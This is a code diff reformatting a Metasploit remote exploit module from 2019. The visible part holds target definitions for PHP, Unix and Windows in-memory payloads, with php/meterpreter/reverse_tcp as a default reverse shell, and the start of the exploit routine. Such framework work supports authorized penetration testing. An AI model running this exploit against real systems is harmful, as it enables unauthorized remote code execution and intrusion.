@@ -29,41 +29,45 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-09-23',
         'License' => MSF_LICENSE,
-        'Platform' => ['php', 'unix', 'windows'],
-        'Arch' => [ARCH_CMD, ARCH_PHP],
         'Privileged' => true,
         'Targets' => [
           [
             'Meterpreter (PHP In-Memory)',
-            'Platform' => 'php',
-            'Arch' => [ARCH_PHP],
-            'Type' => :php_memory,
-            'Payload' => {
-              'BadChars' => "\x22",
-            },
-            'DefaultOptions' => {
-              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-              'DisablePayloadHandler' => false
+            {
+              'Platform' => 'php',
+              'Arch' => [ARCH_PHP],
+              'Type' => :php_memory,
+              'Payload' => {
+                'BadChars' => "\x22"
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                'DisablePayloadHandler' => false
+              }
             }
           ],
           [
             'Unix (CMD In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_cmd,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/generic',
-              'DisablePayloadHandler' => true
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/generic',
+                'DisablePayloadHandler' => true
+              }
             }
           ],
           [
             'Windows (CMD In-Memory)',
-            'Platform' => 'windows',
-            'Arch' => ARCH_CMD,
-            'Type' => :windows_cmd,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/windows/generic',
-              'DisablePayloadHandler' => true
+            {
+              'Platform' => 'windows',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/generic',
+                'DisablePayloadHandler' => true
+              }
             }
           ]
         ],
@@ -114,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    vprint_good("The target appears to be vulnerable.")
+    vprint_good('The target appears to be vulnerable.')
 
     print_status("Sending #{datastore['PAYLOAD']} command payload")
     case target['Type']
